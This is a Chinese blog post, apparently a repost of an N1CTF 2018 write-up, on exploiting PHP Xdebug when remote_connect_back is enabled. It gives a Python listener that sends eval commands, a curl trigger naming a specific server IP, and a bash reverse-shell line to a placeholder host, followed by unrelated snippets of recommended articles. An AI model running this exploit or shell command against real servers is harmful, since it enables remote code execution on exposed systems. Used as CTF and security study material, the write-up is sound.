开放了XDEBUG时的利用方法

最新推荐文章于 2025-03-04 17:58:10 发布
最新推荐文章于 2025-03-04 17:58:10 发布
阅读量4.4k 收藏 2
点赞数
分类专栏: 安全 Web

总结下利用条件,
1. 需要存在xdebug.remote_connect_back=On,并且没有设置xdebug.remote_host,使用$_SERVER['HTTP_X_FORWARDED_FOR']$_SERVER['REMOTE_ADDR']获取IP地址进行回连。这个选项适合多人开发调试使用。
2. 并且知道xdebug.remote_port所设定的端口,默认值为9000。

如果xdebug.remote_connect_back=On,其连接方式有些不同:
服务器IP和HTTP端口10.0.1.2:80
IDE所在机器是未知IP,所以 xdebug.remote_connect_back 设为1。
IDE侦听端口9000,因此 xdebug.remote_port 设为9000
HTTP请求开始, Xdebug通过HTTP头部获取IP地址。
Xdebug连接获取到的IP (10.0.1.42)于端口9000
调试运行,HTTP提供回应。
摘自:https://www.cnblogs.com/xiwang6428/p/5604102.html

呃 写完这些看到了Ricterz师傅的博客里的内容详细的多,https://ricterz.me/posts/Xdebug%3A%20A%20Tiny%20Attack%20Surface
转自:
http://www.bendawang.site/2018/03/13/N1CTF-2018-Web-writeup/
里面easy php题目的解法二:

rr师傅的解法,在phpinfo中不知道为啥看到remote_connect_back = Off,但是那个是php-cli的,而实际我下载下来的镜像跑起来看到的是开着的,即php-fpm实际是开着的,所以能够直接getshell。 这个点rr师傅在之前的whctf出过。关于这个利用的详情可以看rr师傅的博客

这里放一下代码: vps上运行:

#!/usr/bin/python2
import socket
ip_port = ('0.0.0.0',9000)
sk = socket.socket()
sk.bind(ip_port)
sk.listen(10)
conn, addr = sk.accept()
while True:
    client_data = conn.recv(1024)
    print(client_data)
    data = raw_input('>> ')
    conn.sendall('eval -i 1 -- %s\x00' % data.encode('base64'))
    conn.sendall('feature_get -i transaction_id -n feature_name\x00')

然后运行:curl ‘http://47.97.221.96:23333?XDEBUG_SESSION_START

发现代码那边收到信息了, 然后输入

system(‘bash -c “bash -i >& /dev/tcp/vps_ip/vps_port 0<&1 2>&1”’)
就拿到shell,flag在数据库的flag库里面。

〖程序员的自我修养 - 认知剖析篇③〗- 十大编程语言的优缺点
易编橙 · 终身成长社群,相遇已是上上签!
07-26 1万+
我们掌握不了所有的编程语言,但我们掌握的语言越多,在未来的发展与可塑性上就越强,就越容易受到企业的青睐,如果是作为自由开发者的话,也就越会有客户和开发团队与我们合作。 考虑到这一点,希望各位小伙伴能规划好自己的学习计划,并开始一一学习,以成为某一细分领域的技术专家或者某个蓬勃发展领域的顶级专家。
PHP+PhpStorm配置Xdebug
王洪彪的个人博客
11-23 705
最简单的PHP配置XDEBUG
debug简单使用以及PhpStorm 如何开启xdebug
锦衣夜行_
10-05 1824
以前debug都是直接点下面的选项,最近发现这样太loser了,还是记录下快捷键,xdebug在mac环境下还是没有装好所以最近将PHP工作环境切换回windows下面了(主要是快捷键不习惯,当然windows下面软件较为丰富) 一.debug快捷键: 1.按F8 在 Debug 模式下,进入下一步,如果当前行断点是一个方法,则不进入当前方法体内,跳到下一条执行语句。 2.按F7在 Debu...
php 安装 xdebug
最新发布
xuwei1210的博客
03-04 927
PHP 中安装 Xdebug 是一个相对简单的过程,但具体步骤可能会因你的操作系统和 PHP 的安装方式而有所不同。
Xdebug 项目教程
gitblog_00963的博客
10-09 337
Xdebug 项目教程 xdebug Xdebug — Step Debugger and Debugging Aid for PHP 项目地址: https://gitcode.com/gh_mirrors/xd/xdebug ...
xdebug 的使用和配置
qq_38358436的博客
04-21 597
编辑器使用vscode 注意: php 版本 php 是32位还是64位的 php是线程安全(TS) 还是非线程安全 (NTS) 操作系统(linux or windows) php扩展存放目录 以上这些注意点可以通过 phpinfo 来获取查看 PHP version NTS extension 下载安装 ...
Xdebug的安装及使用
天天学安全专属博客
06-23 2715
软件调试是泛指重现软件缺陷问题,定位和 查找问题根源,最终解决问题的过程,编写的程序不可能一直不出错,所以调试很重要定义1:软件调试是为了发现并排除软件程序中 的错误,可以通过某种方法控制被调试程序的执行过 程,以便随查看和修改被调试程序执行状态的方法。在该定义中,软件测试属于软件调试的一部分,与 牛津词典中的调试定义类似。在牛津词典中调试定义 为:“识别和排除计算机硬件或软件中错误的过程。定义2:调试是执行一次成功的测试之后所要进 行的工作。所谓成功的测试,是指它可以证明程序没 有实现预期的功能。
宝塔 开启xdebug_xdebug安装及使用小结
weixin_35702295的博客
12-31 572
最近安装了一下xedug,并且学习了一下如何使用。安装xdebug的初衷是为了深入研究一下PHP的垃圾回收机制。Xdebug是一个开放源代码的PHP程序调试器(即一个Debug工具),可以用来跟踪,调试和分析PHP程序的运行状况。先说一下安装吧。我使用的php版本是5.3.3,windows 32 为环境。放入php的ext目录下。接着改写了php.ini[Xdebug]zend_extensio...
Xdebug远程调试原理】:深入理解Xdebug调试机制
![【Xdebug远程调试原理】:深入理解Xdebug调试机制]...文中详细解释了Xdebug的工作原理、远程调试的优势
xdebug入门指南:设置和配置
什么是xdebug? ## 1.1 xdebug的定义和作用 xdebug是一个针对PHP开发的强大调试和性能分析工具。它可以帮助开发人员更轻松地进行代码调试、跟踪执行过程、查看变量内容,并提供详尽的错误信息。 ## 1.2 xdebug的...
调试远程服务器:使用xdebug和SSH
# 1....常见的工具包括xdebug、Zend Debugger、XHProf等,而方法主要有SSH隧道、远程端口转发、VPN、代理等。在本章节中,我们将重点介绍xdebug和SSH的组合使用,因为它们是使用较为广泛和便捷的调
xdebug分析PHP以及结果分析程序webgrind的使用
步知道
01-13 1539
我们在做项目的候,经常需要编写大量的PHP代码,有很多的方法以及变量,当项目进行到一定程度,代码越来越多,你会发现程序变慢,但有我们不知道具体是哪块代码执行慢,或者哪个方法占用了太长的执行间,这我们就需要一个调试工具,来帮我们记录程序执行过程中的一些具体信息,包括类、方法名、执行间、次数等信息,今天介绍的工具是xdebug以及他的结果分析展示工具webgrind。    xdebug
简单使用xdebug
liujihaozhy的专栏
03-23 1009
其实这个插件我还是很少使用的,复习下【window7安装】。首先检查下php的版本:进入xdebug下载页面:https://xdebug.org/download.php根据版本,我们选择对应的dll:经过实践,php_xdebug-2.6.0-7.0-vc14.dll在本人本机安装成功打开php.ini进行配置XDEBUG;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;...
2011.09.12_php 优化工具 xdebug
记录点滴
05-09 566
http://www.xuephp.com/main/detail.php?cid=16577 前言: 在我们平的php开发中,一个大的项目经过长间的积累以后你会发现性能越来越慢,而性能到底消耗在了什么地方,常常是一个令人头疼的问题,function a()调用了多少次,function b()又消耗了多少间,我们到底怎么查找是哪个蛀虫拉慢了我们的程序运行速度呢?在这里给大家
PHP奇淫巧计— Xdebug helper 配合PhpStorm调试技巧
Android小码家
05-15 2643
相信大多数前端工程师 都有不同程度的被后台坑过的经历吧?痛定思痛 终究只能怪我们有求于人,谁让你们不会PHP开发呢?you can you up 啊?我们可能听说过 这样的说法:1.PHP不能解析中文。2.PHP不能调试。3.PHP返回参数datas 这个永远都是一个[] ,不可能是{}。以上三个问题困扰了我很久,我想大家应该也有相关的疑问吧?先抛开问题不说,我觉得开发PHP的作者应该不会没有考虑...
Xdebug使用指南
入海数沙
12-30 579
作者:blankyao 发布间:September 13, 2009 分类:PHP笔记 想想我从前没用Xdebug候,真不敢想象那种日子啊,所以今天打算把这个东西介绍给大家,虽然不是什么新东西,毕竟很多同学还木有用过,所以我还是费点笔墨写写吧。我在这里主要介绍如下几点:Xdebug是什么?Xdebug的Stack trace功能用Xdebug来查看...
Xdebug:PHP开发者的调试利器
gitblog_00996的博客
10-09 462
Xdebug:PHP开发者的调试利器 xdebug Xdebug — Step Debugger and Debugging Aid for PHP 项目地址: https://gitcode.com/gh_mirrors/xd/...
PHP调试利器——Xdebug使用教程
艾华生的博客
05-15 805
####1 下载Xdebug扩展 将phpinfo()中的信息全部复制到Xdebug中的文本框中,如下图所示:点击“Analyse my phpinfo() output”按钮。 跳转到如下图所示页面,会对本机中的php进行分析,点击“1 Download php_xdebug-2.7.2-7.2-vc15-x86_64.dll”按钮下载Xdebug扩展。 ####2 配置Xdebug扩展 将...
PhpStorm+xdebug远程调试配置关键
江下飞雪
03-01 3824
搞清楚原理,一切明了 xdebug调试原理 IDE(如PhpStorm)已经集成了一个遵循BGDP的Xdebug插件,当开启它的候, 会在本地开一个Xdebug调试服务,监听在调试器中所设置的端口上,默认是9000,这个服务就会监听所有到9000端口的链接。在PhpStorm中,位于:工具栏 > Run > Start / Stop Listening for PHP Xdebug Connetions。 当浏览器发送一个带 XDEBUG_SESSION_START 的参.
无法打开调试器端口 : java.net.ConnectException "Connection refused: connect"
01-17
### Java 调试器连接被拒绝的原因分析 当遇到 `connection refused` 错误,通常意味着目标机器上的调试端口未监听或防火墙阻止了连接请求。对于 Eclipse IDE 中的 Java 应用程序调试,确保以下几点: #### 配置 JVM 启动参数 为了使远程调试工作正常,在启动应用程序需添加特定的 JVM 参数来启用调试模式并指定监听端口。例如,可以使用如下命令行选项[^1]: ```bash -agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=*:5005 ``` 这会告诉 JVM 打开 socket 连接方式,并在 5005 端口上等待来自客户端(即开发环境)的连接。 #### 检查防火墙设置 如果应用服务器位于不同的物理位置,则可能需要调整网络配置以允许通过所选端口号的数据传输。参照 PHP 的 XDebug 设置说明可知,除了内部网和虚拟专用网络外,其他情况下往往还需要修改防火墙规则以及安全软件策略以便让 xdebug 可以成功建立到本地机器 9000 端口的连接[^2]。同样道理适用于任何语言编写的 Web 应用程序及其对应的调试工具。 #### 使用正确的 IP 地址与主机名 确认正在使用的 IP 地址或主机名称是否正确无误。有开发者可能会错误地指定了 localhost 或者不恰当的地址作为目标地址,从而导致无法建立起有效的 TCP/IP 连接。 #### 测试连通性 利用简单的 telnet 命令测试源码所在计算机能否访问目的机上的相应端口是非常有帮助的做法。比如执行下面这条指令看看能不能顺利到达服务端开放出来的侦听接口: ```bash telnet <target-ip> 5005 ``` #### 查看日志文件 查看运行中的进程产生的日志记录有助于发现潜在的问题根源。特别是关于绑定失败的信息可以帮助定位具体原因。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值